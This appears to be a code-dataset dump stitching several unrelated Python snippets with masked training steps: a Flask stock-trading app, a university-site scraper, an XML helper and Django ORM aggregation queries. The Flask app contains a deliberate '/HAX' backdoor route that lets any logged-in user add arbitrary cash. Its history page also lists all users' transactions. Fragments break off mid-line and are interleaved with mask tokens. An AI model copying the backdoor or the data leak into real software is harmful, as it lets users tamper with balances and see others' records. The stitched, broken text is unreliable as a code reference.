protected](\"/\")\n@login_required\ndef index():\n \"\"\"Show portfolio of stocks\"\"\"\n rows=db.execute(\"SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions\",session[\"user_id\"])\n cash=db.execute(\"SELECT cash FROM users WHERE id=?\",session[\"user_id\"])\n cash_=cash[0][\"cash\"]\n\n #store all the data into a dict so its easier to pass in to html\n display=[]\n total_share=0\n for row in rows:\n symbol=str(row[\"symbol\"])\n print(symbol)\n name=lookup(symbol)[\"name\"]\n shares=int(row[\"amount\"])\n price=float(lookup(symbol)[\"price\"])\n total=float(shares) *price\n total_share+=total\n display.append({'symbol':symbol, 'name':name, 'shares':shares, 'price':price, 'total':total})\n\n total_money=total_share+cash[0][\"cash\"]\n return render_template(\"index.html\",display=display,total_money=total_money,cash=cash_)\n\n\n\[email protected](\"/buy\", methods=[\"GET\", \"POST\"])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == \"POST\":\n\n # Ensure symbol was submitted\n if not request.form.get(\"symbol\"):\n return apology(\"must provide symbol\", 400)\n\n # Ensure shares was submitted\n elif not request.form.get(\"shares\"):\n return apology(\"must provide shares\", 400)\n\n if not request.form.get(\"shares\").isdigit():\n return apology(\"must be integer\",400)\n\n elif int(request.form.get(\"shares\"))<1 :\n return apology(\"must be positive integer\", 400)\n\n elif lookup(request.form.get(\"symbol\"))==None:\n return apology(\"Must be a valid symbol\",400)\n\n #ensure money>price\n quote=lookup(request.form.get(\"symbol\"))\n shares=request.form.get(\"shares\")\n cash=db.execute(\"SELECT cash FROM users WHERE id=?\",session[\"user_id\"])\n if cash[0][\"cash\"]<int(quote[\"price\"])*int(shares):\n return apology(\"You can't affort this/these\",400)\n\n #BUY, STORE DATA IN REPOSITORY AND RECORD\n\n #record this transaction\n db.execute(\"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))\",session[\"user_id\"],int(shares),quote[\"symbol\"],float(quote[\"price\"]))\n\n #deduct the cash\n total=int(quote[\"price\"])*int(shares)\n db.execute(\"UPDATE users SET cash=cash- (?) WHERE id=?\",total,session[\"user_id\"])\n\n return redirect(\"/\")\n\n else:\n return render_template(\"buy.html\")\n\[email protected](\"/history\")\n@login_required\ndef history():\n \"\"\"Show history of transactions\"\"\"\n rows=db.execute(\"SELECT * FROM record ORDER BY t1\")\n return render_template(\"history.html\",rows=rows)\n\n\[email protected](\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n \"\"\"Log user in\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # User reached route via POST (as by submitting a form via POST)\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 403)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 403)\n\n # Query database for username\n rows = db.execute(\"SELECT * FROM users WHERE username = ?\", request.form.get(\"username\"))\n\n # Ensure username exists and password is correct\n if len(rows) != 1 or not check_password_hash(rows[0][\"hash\"], request.form.get(\"password\")):\n return apology(\"invalid username and/or password\", 403)\n\n # Remember which user has logged in\n session[\"user_id\"] = rows[0][\"id\"]\n\n # Redirect user to home page\n return redirect(\"/\")\n\n # User reached route via GET (as by clicking a link or via redirect)\n else:\n return render_template(\"login.html\")\n\n\[email protected](\"/logout\")\ndef logout():\n \"\"\"Log user out\"\"\"\n\n # Forget any user_id\n session.clear()\n\n # Redirect user to login form\n return redirect(\"/\")\n\n\[email protected](\"/quote\", methods=[\"GET\", \"POST\"])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n if request.method==\"POST\":\n quote=lookup(request.form.get(\"symbol\"))\n if quote==None:\n return apology(\"Invalid symbol\",400)\n price=usd(quote[\"price\"])\n return render_template(\"quoted.html\",quote=quote,price=price)\n else:\n return render_template(\"quote.html\")\n\[email protected](\"/register\", methods=[\"GET\", \"POST\"])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == \"POST\":\n\n # Ensure username was submitted\n if not request.form.get(\"username\"):\n return apology(\"must provide username\", 400)\n\n # Ensure password was submitted\n elif not request.form.get(\"password\"):\n return apology(\"must provide password\", 400)\n\n # Ensure comfirm password was submitted\n elif not request.form.get(\"confirmation\"):\n return apology(\"must comfirm password\", 400)\n\n # Ensure password matches\n elif request.form.get(\"confirmation\") != request.form.get(\"password\"):\n return apology(\"Password not matches\",400)\n\n # Ensure username is new(unique)\n rows = db.execute(\"SELECT * FROM users WHERE username = ?\", request.form.get(\"username\"))\n if len(rows) != 0:\n return apology(\"username used\", 400)\n\n db.execute(\"INSERT INTO users (username,hash) VALUES (?,?)\",request.form.get(\"username\"),generate_password_hash(request.form.get(\"password\")))\n\n\n # Redirect user to home page\n return redirect(\"/\")\n\n\n else:\n return render_template(\"register.html\")\n\n\[email protected](\"/sell\", methods=[\"GET\", \"POST\"])\n@login_required\ndef sell():\n \"\"\"Sell shares of stock\"\"\"\n if request.method=='POST':\n #parameter is not filled\n if not request.form.get(\"shares\"):\n return apology(\"Please enter how much u want to sell\",400)\n #check if shares(amount) that are going to be sell less than owner's share.\n sell=request.form.get(\"symbol\")\n shares=request.form.get(\"shares\")\n amount=db.execute(\"SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions\",session[\"user_id\"],sell)\n if amount[0][\"amount\"]<int(shares):\n return apology(\"You dont own that much shares\",400)\n\n #record sell and add cash amount\n quote=lookup(sell)\n price=quote[\"price\"]\n total=int(price)*int(shares)\n\n db.execute(\"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))\",session[\"user_id\"],(int(shares)*-1),quote[\"symbol\"],price)\n db.execute(\"UPDATE users SET cash=cash+ (?) WHERE id=?\",total,session[\"user_id\"])\n\n return redirect(\"/\")\n\n else:\n rows=db.execute(\"SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions\",session[\"user_id\"])\n\n return render_template(\"sell.html\",rows=rows)\n\n\n\[email protected](\"/HAX\", methods=[\"GET\", \"POST\"])\n@login_required\ndef HAX():\n #add free monei boiiii\n if request.method==\"POST\":\n total=request.form.get(\"HAX\")\n db.execute(\"UPDATE users SET cash=cash+ (?) WHERE id=?\",total,session[\"user_id\"])\n flash(u'HAX SUCCESSFULLY ACTIVATED!!!')\n\n return redirect(\"/\")\n\n else:\n return render_template(\"HAX.html\")\n\n\n\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n return apology(e.name, e.code)\n\n\n# Listen for errors\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)\n",
"step-ids": [
3,
9,
13,
14,
15
]
}
|
[
3,
9,
13,
14,
15
] |
# *Using Min & Max Exercise
def extremes(nums):
return (max(nums), min(nums))
|
normal
|
{
"blob_id": "0577c274672bac333500535f21f568ade62100c7",
"index": 3580,
"step-1": "<mask token>\n",
"step-2": "def extremes(nums):\n return max(nums), min(nums)\n",
"step-3": "\n# *Using Min & Max Exercise\ndef extremes(nums):\n return (max(nums), min(nums))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
def estudios(Minisoup):
print('2.Estudios')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def estudios(Minisoup):
print('2.Estudios')
try:
html_content = requests.get(url2).text
except:
print(f'unable to get {url2}')
sys.exit(1)
<|reserved_special_token_0|>
print('Display all items from topmenu:')
<|reserved_special_token_0|>
for datos in tabla.findAll('li'):
celda = datos.text
b += 1
print(b, '<', celda, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display all Estudios:')
<|reserved_special_token_0|>
for datos in tablas1.findAll('div', {'class': 'estudios'}):
celdas = datos.text
print('-', celdas)
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display from leftbar all <li> items:')
<|reserved_special_token_0|>
for datos in tablas2.findAll('li'):
celdas2 = datos.text
c += 1
print(c, '<', celdas2, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'Get and display all available social media with its links (href) class =social pull -right:'
)
<|reserved_special_token_0|>
for datos in tablas3.findAll('a'):
celdas3 = datos.get('href')
print('-<', celdas3, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
<|reserved_special_token_0|>
for datos in soup.find_all('a'):
d += 1
print('count all <a: <', d, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'======================================================================================================='
)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
url2 = 'http://ufm.edu/Estudios'
def estudios(Minisoup):
print('2.Estudios')
try:
html_content = requests.get(url2).text
except:
print(f'unable to get {url2}')
sys.exit(1)
soup = BeautifulSoup(html_content, 'html.parser')
print('Display all items from topmenu:')
b = 0
tabla = soup.find('div', {'id': 'topmenu'})
for datos in tabla.findAll('li'):
celda = datos.text
b += 1
print(b, '<', celda, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display all Estudios:')
tablas1 = soup.find('div', {'id': 'mw-content-text'})
for datos in tablas1.findAll('div', {'class': 'estudios'}):
celdas = datos.text
print('-', celdas)
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display from leftbar all <li> items:')
c = 0
tablas2 = soup.find('div', {'class': 'leftbar'})
for datos in tablas2.findAll('li'):
celdas2 = datos.text
c += 1
print(c, '<', celdas2, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'Get and display all available social media with its links (href) class =social pull -right:'
)
tablas3 = soup.find('div', {'class': 'social pull-right'})
for datos in tablas3.findAll('a'):
celdas3 = datos.get('href')
print('-<', celdas3, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
d = 0
for datos in soup.find_all('a'):
d += 1
print('count all <a: <', d, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'======================================================================================================='
)
<|reserved_special_token_1|>
from bs4 import BeautifulSoup, CData
import requests, sys, csv, json, os, urllib.request, re
import json
url2 = 'http://ufm.edu/Estudios'
def estudios(Minisoup):
print('2.Estudios')
try:
html_content = requests.get(url2).text
except:
print(f'unable to get {url2}')
sys.exit(1)
soup = BeautifulSoup(html_content, 'html.parser')
print('Display all items from topmenu:')
b = 0
tabla = soup.find('div', {'id': 'topmenu'})
for datos in tabla.findAll('li'):
celda = datos.text
b += 1
print(b, '<', celda, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display all Estudios:')
tablas1 = soup.find('div', {'id': 'mw-content-text'})
for datos in tablas1.findAll('div', {'class': 'estudios'}):
celdas = datos.text
print('-', celdas)
print(
'-------------------------------------------------------------------------------------------------------'
)
print('Display from leftbar all <li> items:')
c = 0
tablas2 = soup.find('div', {'class': 'leftbar'})
for datos in tablas2.findAll('li'):
celdas2 = datos.text
c += 1
print(c, '<', celdas2, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'Get and display all available social media with its links (href) class =social pull -right:'
)
tablas3 = soup.find('div', {'class': 'social pull-right'})
for datos in tablas3.findAll('a'):
celdas3 = datos.get('href')
print('-<', celdas3, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
d = 0
for datos in soup.find_all('a'):
d += 1
print('count all <a: <', d, '>')
print(
'-------------------------------------------------------------------------------------------------------'
)
print(
'======================================================================================================='
)
<|reserved_special_token_1|>
from bs4 import BeautifulSoup, CData
import requests,sys,csv,json,os, urllib.request, re
import json
url2 = "http://ufm.edu/Estudios"
def estudios(Minisoup):
print("2.Estudios")
#now navigate to /Estudios (better if you obtain href from the DOM)
try:
html_content = requests.get(url2).text
except:
print(f"unable to get {url2}")
sys.exit(1)
soup = BeautifulSoup(html_content, "html.parser")
#display all items from "topmenu" (8 in total)
print("Display all items from topmenu:")
b = 0
tabla = soup.find("div", { "id" : "topmenu" })
for datos in tabla.findAll("li"):
# for datos in tabla.findAll("a",{"class":"external text"}):
celda = datos.text
b += 1
print(b,"<",celda,">")
print("-------------------------------------------------------------------------------------------------------")
#display ALL "Estudios" (Doctorados/Maestrias/Posgrados/Licenciaturas/Baccalaureus)
print("Display all Estudios:")
tablas1 = soup.find("div",{"id":"mw-content-text"})
for datos in tablas1.findAll("div",{"class":"estudios"}):
celdas = datos.text
print("-",celdas)
print("-------------------------------------------------------------------------------------------------------")
#display from "leftbar" all <li> items (4 in total)
print("Display from leftbar all <li> items:")
c=0
tablas2 = soup.find("div",{"class":"leftbar"})
for datos in tablas2.findAll("li"):
#for datos in tablas2.findAll("a",{"class":"external text"}):
celdas2 = datos.text
c += 1
#print(celdas2)
print(c,"<",celdas2,">")
print("-------------------------------------------------------------------------------------------------------")
#get and display all available social media with its links (href) "class=social pull-right"
print("Get and display all available social media with its links (href) class =social pull -right:")
tablas3 = soup.find("div",{"class":"social pull-right"})
for datos in tablas3.findAll('a'):
celdas3 = datos.get('href')
print("-<",celdas3,">")
print("-------------------------------------------------------------------------------------------------------")
#count all <a> (just display the count)
d=0
for datos in soup.find_all('a'):
d += 1
print("count all <a: <",d,">")
print("-------------------------------------------------------------------------------------------------------")
print("=======================================================================================================")
|
flexible
|
{
"blob_id": "846682072a125c76fc9ffa011109abce7c3bb5d7",
"index": 3269,
"step-1": "<mask token>\n\n\ndef estudios(Minisoup):\n print('2.Estudios')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef estudios(Minisoup):\n print('2.Estudios')\n\n\ntry:\n html_content = requests.get(url2).text\nexcept:\n print(f'unable to get {url2}')\n sys.exit(1)\n<mask token>\nprint('Display all items from topmenu:')\n<mask token>\nfor datos in tabla.findAll('li'):\n celda = datos.text\n b += 1\n print(b, '<', celda, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display all Estudios:')\n<mask token>\nfor datos in tablas1.findAll('div', {'class': 'estudios'}):\n celdas = datos.text\n print('-', celdas)\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display from leftbar all <li> items:')\n<mask token>\nfor datos in tablas2.findAll('li'):\n celdas2 = datos.text\n c += 1\n print(c, '<', celdas2, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n 'Get and display all available social media with its links (href) class =social pull -right:'\n )\n<mask token>\nfor datos in tablas3.findAll('a'):\n celdas3 = datos.get('href')\n print('-<', celdas3, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\n<mask token>\nfor datos in soup.find_all('a'):\n d += 1\nprint('count all <a: <', d, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n '======================================================================================================='\n )\n",
"step-3": "<mask token>\nurl2 = 'http://ufm.edu/Estudios'\n\n\ndef estudios(Minisoup):\n print('2.Estudios')\n\n\ntry:\n html_content = requests.get(url2).text\nexcept:\n print(f'unable to get {url2}')\n sys.exit(1)\nsoup = BeautifulSoup(html_content, 'html.parser')\nprint('Display all items from topmenu:')\nb = 0\ntabla = soup.find('div', {'id': 'topmenu'})\nfor datos in tabla.findAll('li'):\n celda = datos.text\n b += 1\n print(b, '<', celda, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display all Estudios:')\ntablas1 = soup.find('div', {'id': 'mw-content-text'})\nfor datos in tablas1.findAll('div', {'class': 'estudios'}):\n celdas = datos.text\n print('-', celdas)\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display from leftbar all <li> items:')\nc = 0\ntablas2 = soup.find('div', {'class': 'leftbar'})\nfor datos in tablas2.findAll('li'):\n celdas2 = datos.text\n c += 1\n print(c, '<', celdas2, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n 'Get and display all available social media with its links (href) class =social pull -right:'\n )\ntablas3 = soup.find('div', {'class': 'social pull-right'})\nfor datos in tablas3.findAll('a'):\n celdas3 = datos.get('href')\n print('-<', celdas3, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nd = 0\nfor datos in soup.find_all('a'):\n d += 1\nprint('count all <a: <', d, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n '======================================================================================================='\n )\n",
"step-4": "from bs4 import BeautifulSoup, CData\nimport requests, sys, csv, json, os, urllib.request, re\nimport json\nurl2 = 'http://ufm.edu/Estudios'\n\n\ndef estudios(Minisoup):\n print('2.Estudios')\n\n\ntry:\n html_content = requests.get(url2).text\nexcept:\n print(f'unable to get {url2}')\n sys.exit(1)\nsoup = BeautifulSoup(html_content, 'html.parser')\nprint('Display all items from topmenu:')\nb = 0\ntabla = soup.find('div', {'id': 'topmenu'})\nfor datos in tabla.findAll('li'):\n celda = datos.text\n b += 1\n print(b, '<', celda, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display all Estudios:')\ntablas1 = soup.find('div', {'id': 'mw-content-text'})\nfor datos in tablas1.findAll('div', {'class': 'estudios'}):\n celdas = datos.text\n print('-', celdas)\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint('Display from leftbar all <li> items:')\nc = 0\ntablas2 = soup.find('div', {'class': 'leftbar'})\nfor datos in tablas2.findAll('li'):\n celdas2 = datos.text\n c += 1\n print(c, '<', celdas2, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n 'Get and display all available social media with its links (href) class =social pull -right:'\n )\ntablas3 = soup.find('div', {'class': 'social pull-right'})\nfor datos in tablas3.findAll('a'):\n celdas3 = datos.get('href')\n print('-<', celdas3, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nd = 0\nfor datos in soup.find_all('a'):\n d += 1\nprint('count all <a: <', d, '>')\nprint(\n '-------------------------------------------------------------------------------------------------------'\n )\nprint(\n '======================================================================================================='\n )\n",
"step-5": "from bs4 import BeautifulSoup, CData\nimport requests,sys,csv,json,os, urllib.request, re\nimport json\n\n\nurl2 = \"http://ufm.edu/Estudios\"\ndef estudios(Minisoup):\n print(\"2.Estudios\")\n\n#now navigate to /Estudios (better if you obtain href from the DOM)\ntry:\n html_content = requests.get(url2).text\nexcept:\n print(f\"unable to get {url2}\")\n sys.exit(1)\n\nsoup = BeautifulSoup(html_content, \"html.parser\")\n\n#display all items from \"topmenu\" (8 in total)\nprint(\"Display all items from topmenu:\")\nb = 0\ntabla = soup.find(\"div\", { \"id\" : \"topmenu\" })\nfor datos in tabla.findAll(\"li\"):\n# for datos in tabla.findAll(\"a\",{\"class\":\"external text\"}):\n celda = datos.text\n b += 1\n print(b,\"<\",celda,\">\")\nprint(\"-------------------------------------------------------------------------------------------------------\")\n\n#display ALL \"Estudios\" (Doctorados/Maestrias/Posgrados/Licenciaturas/Baccalaureus)\nprint(\"Display all Estudios:\")\ntablas1 = soup.find(\"div\",{\"id\":\"mw-content-text\"})\nfor datos in tablas1.findAll(\"div\",{\"class\":\"estudios\"}):\n celdas = datos.text\n print(\"-\",celdas)\nprint(\"-------------------------------------------------------------------------------------------------------\")\n\n#display from \"leftbar\" all <li> items (4 in total)\nprint(\"Display from leftbar all <li> items:\")\nc=0\ntablas2 = soup.find(\"div\",{\"class\":\"leftbar\"})\nfor datos in tablas2.findAll(\"li\"):\n#for datos in tablas2.findAll(\"a\",{\"class\":\"external text\"}):\n celdas2 = datos.text\n c += 1\n #print(celdas2) \n print(c,\"<\",celdas2,\">\")\nprint(\"-------------------------------------------------------------------------------------------------------\")\n\n#get and display all available social media with its links (href) \"class=social pull-right\"\nprint(\"Get and display all available social media with its links (href) class =social pull -right:\")\ntablas3 = soup.find(\"div\",{\"class\":\"social pull-right\"})\nfor datos in tablas3.findAll('a'):\n celdas3 = datos.get('href')\n print(\"-<\",celdas3,\">\")\nprint(\"-------------------------------------------------------------------------------------------------------\")\n\n#count all <a> (just display the count)\nd=0\nfor datos in soup.find_all('a'):\n d += 1\nprint(\"count all <a: <\",d,\">\")\nprint(\"-------------------------------------------------------------------------------------------------------\")\nprint(\"=======================================================================================================\")",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
# -*- coding: utf-8 -*-
#some xml helpers
from xml.dom.minidom import Document
class XMLReport:
def __init__(self, name):
self.doc = Document()
self.main_node = self.add(name, node=self.doc)
def add(self, name, node=None):
if node is None: node = self.main_node
elem = self.doc.createElement(name)
node.appendChild(elem)
return elem
def text(self, text, node):
node.appendChild(self.doc.createTextNode(text))
def set_node_info(self, node, typ):
node.setAttribute("type-id", hex(typ.id))
node.setAttribute("name", typ.get_name())
def __str__(self):
return self.doc.toprettyxml(indent=" ")
|
normal
|
{
"blob_id": "146487738006ce3efb5bd35c425835a1fd8e0145",
"index": 9490,
"step-1": "# -*- coding: utf-8 -*-\n#some xml helpers\nfrom xml.dom.minidom import Document\n\nclass XMLReport:\n def __init__(self, name):\n\tself.doc = Document()\n\tself.main_node = self.add(name, node=self.doc)\n \n def add(self, name, node=None):\n\tif node is None: node = self.main_node\n\telem = self.doc.createElement(name)\n\tnode.appendChild(elem)\n\treturn elem\n \n def text(self, text, node):\n\tnode.appendChild(self.doc.createTextNode(text))\n \n def set_node_info(self, node, typ):\n\tnode.setAttribute(\"type-id\", hex(typ.id))\n\tnode.setAttribute(\"name\", typ.get_name())\n\n def __str__(self):\n\treturn self.doc.toprettyxml(indent=\" \")",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_case(str_arg):
first_life_and_work(str_arg)
print('small_hand')
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_case(str_arg):
first_life_and_work(str_arg)
print('small_hand')
def first_life_and_work(str_arg):
print(str_arg)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
def get_case(str_arg):
first_life_and_work(str_arg)
print('small_hand')
def first_life_and_work(str_arg):
print(str_arg)
if __name__ == '__main__':
get_case('thing')
<|reserved_special_token_1|>
#! /usr/bin/env python
def get_case(str_arg):
first_life_and_work(str_arg)
print('small_hand')
def first_life_and_work(str_arg):
print(str_arg)
if __name__ == '__main__':
get_case('thing')
|
flexible
|
{
"blob_id": "7a2ac3a3a2bbd7349e8cc62b4d357394d9600cc8",
"index": 6326,
"step-1": "<mask token>\n",
"step-2": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\n<mask token>\n",
"step-3": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\n\n<mask token>\n",
"step-4": "def get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\n\nif __name__ == '__main__':\n get_case('thing')\n",
"step-5": "\n#! /usr/bin/env python\n\ndef get_case(str_arg):\n first_life_and_work(str_arg)\n print('small_hand')\n\ndef first_life_and_work(str_arg):\n print(str_arg)\n\nif __name__ == '__main__':\n get_case('thing')\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
def firstDuplicate(array):
"""
Time O(n) | Space O(n)
"""
dic = {}
for num in array:
if num in dic:
return num
else:
dic[num] = True
return -1
print(firstDuplicate([2, 1, 3, 5, 3]))
|
normal
|
{
"blob_id": "47259844f76f12060f0cf52f1086c05b9f300175",
"index": 8581,
"step-1": "<mask token>\n",
"step-2": "def firstDuplicate(array):\n \"\"\"\n Time O(n) | Space O(n)\n \"\"\"\n dic = {}\n for num in array:\n if num in dic:\n return num\n else:\n dic[num] = True\n return -1\n\n\n<mask token>\n",
"step-3": "def firstDuplicate(array):\n \"\"\"\n Time O(n) | Space O(n)\n \"\"\"\n dic = {}\n for num in array:\n if num in dic:\n return num\n else:\n dic[num] = True\n return -1\n\n\nprint(firstDuplicate([2, 1, 3, 5, 3]))\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
application_vue_demo = Blueprint('application_vue_demo', __name__)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from flask import Blueprint
application_vue_demo = Blueprint('application_vue_demo', __name__)
from . import views
|
flexible
|
{
"blob_id": "a33abd253288140f8051aced1d0ed1e41b2fc786",
"index": 8067,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napplication_vue_demo = Blueprint('application_vue_demo', __name__)\n<mask token>\n",
"step-3": "from flask import Blueprint\napplication_vue_demo = Blueprint('application_vue_demo', __name__)\nfrom . import views\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
import os
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "day66.settings")
import django
django.setup()
from applistions.models import MyClass,Student,Teacher,Employee
from django.db.models import Avg, Sum, Max, Min, Count
# 1.求所有人里面工资最高的
ret = Employee.objects.all().aggregate(Max('salary'))
print(ret) # {'salary__max': 80909}
# # 指定返回字典中key的值
ret = Employee.objects.all().aggregate(max_salary=Max('salary'))
print(ret) # {'max_salary': 80909}
# # 求所有人的平均价格
ret = Employee.objects.all().aggregate(Avg('salary'))
print(ret) # {'salary__avg': 20855.1667}
# 使用ORM查询每个部门的平均工资
ret = Employee.objects.values('dept').aggregate(Avg('salary'))
print(ret) # 查询的是每个人的平均工资,此条查询错误
# annotate中要写上分住之后要做的事情
# anntate前面查询的是什么就按什么分组
ret = Employee.objects.values('dept').annotate(Avg('salary')).values_list('dept','salary__avg')
print(ret) # <QuerySet [('财务部', 2111.0), ('技术部', 17000.0), ('人事部', 6000.0), ('管理部', 80909.0)]>
# # ORM中分组使用annotate
# # 1. annotate中要写上分组之后要做的事情
# # 2. annotate前面查询的是什么就按什么分组
# ret = Employee.objects.values('dept').annotate(avg_price=Avg('salary')).values('dept', 'avg_price')
# print(ret)
#
# # 每个部门的平均年龄
ret = Employee.objects.values('dept').annotate(avg_age=Avg('age')).values_list('dept','avg_age')
print(ret) # <QuerySet [('财务部', 27.5), ('技术部', 300.0), ('人事部', 45.0), ('管理部', 45.0)]>
# # 求每个班级的学生的数量
ret = Student.objects.values('myclass').annotate(s_count=Count('id'))
print(ret) # <QuerySet [{'myclass': 1, 's_count': 1}, {'myclass': 2, 's_count': 3}, {'myclass': 3, 's_count': 2}, {'myclass': 4, 's_count': 1}, {'myclass': 5, 's_count': 1}, {'myclass': 6, 's_count': 1}, {'myclass': 7, 's_count': 1}]>
|
normal
|
{
"blob_id": "ee72262fb29b46784fb357269dd5160192968c1b",
"index": 1713,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'day66.settings')\n import django\n django.setup()\n from applistions.models import MyClass, Student, Teacher, Employee\n from django.db.models import Avg, Sum, Max, Min, Count\n ret = Employee.objects.all().aggregate(Max('salary'))\n print(ret)\n ret = Employee.objects.all().aggregate(max_salary=Max('salary'))\n print(ret)\n ret = Employee.objects.all().aggregate(Avg('salary'))\n print(ret)\n ret = Employee.objects.values('dept').aggregate(Avg('salary'))\n print(ret)\n ret = Employee.objects.values('dept').annotate(Avg('salary')).values_list(\n 'dept', 'salary__avg')\n print(ret)\n ret = Employee.objects.values('dept').annotate(avg_age=Avg('age')\n ).values_list('dept', 'avg_age')\n print(ret)\n ret = Student.objects.values('myclass').annotate(s_count=Count('id'))\n print(ret)\n",
"step-3": "import os\nif __name__ == '__main__':\n os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'day66.settings')\n import django\n django.setup()\n from applistions.models import MyClass, Student, Teacher, Employee\n from django.db.models import Avg, Sum, Max, Min, Count\n ret = Employee.objects.all().aggregate(Max('salary'))\n print(ret)\n ret = Employee.objects.all().aggregate(max_salary=Max('salary'))\n print(ret)\n ret = Employee.objects.all().aggregate(Avg('salary'))\n print(ret)\n ret = Employee.objects.values('dept').aggregate(Avg('salary'))\n print(ret)\n ret = Employee.objects.values('dept').annotate(Avg('salary')).values_list(\n 'dept', 'salary__avg')\n print(ret)\n ret = Employee.objects.values('dept').annotate(avg_age=Avg('age')\n ).values_list('dept', 'avg_age')\n print(ret)\n ret = Student.objects.values('myclass').annotate(s_count=Count('id'))\n print(ret)\n",
"step-4": "import os\n\nif __name__ == \"__main__\":\n os.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"day66.settings\")\n\n import django\n django.setup()\n\n from applistions.models import MyClass,Student,Teacher,Employee\n from django.db.models import Avg, Sum, Max, Min, Count\n\n # 1.求所有人里面工资最高的\n ret = Employee.objects.all().aggregate(Max('salary'))\n print(ret) # {'salary__max': 80909}\n\n # # 指定返回字典中key的值\n ret = Employee.objects.all().aggregate(max_salary=Max('salary'))\n print(ret) # {'max_salary': 80909}\n\n # # 求所有人的平均价格\n ret = Employee.objects.all().aggregate(Avg('salary'))\n print(ret) # {'salary__avg': 20855.1667}\n\n # 使用ORM查询每个部门的平均工资\n ret = Employee.objects.values('dept').aggregate(Avg('salary'))\n print(ret) # 查询的是每个人的平均工资,此条查询错误\n # annotate中要写上分住之后要做的事情\n # anntate前面查询的是什么就按什么分组\n ret = Employee.objects.values('dept').annotate(Avg('salary')).values_list('dept','salary__avg')\n print(ret) # <QuerySet [('财务部', 2111.0), ('技术部', 17000.0), ('人事部', 6000.0), ('管理部', 80909.0)]>\n\n # # ORM中分组使用annotate\n # # 1. annotate中要写上分组之后要做的事情\n # # 2. annotate前面查询的是什么就按什么分组\n # ret = Employee.objects.values('dept').annotate(avg_price=Avg('salary')).values('dept', 'avg_price')\n # print(ret)\n #\n # # 每个部门的平均年龄\n ret = 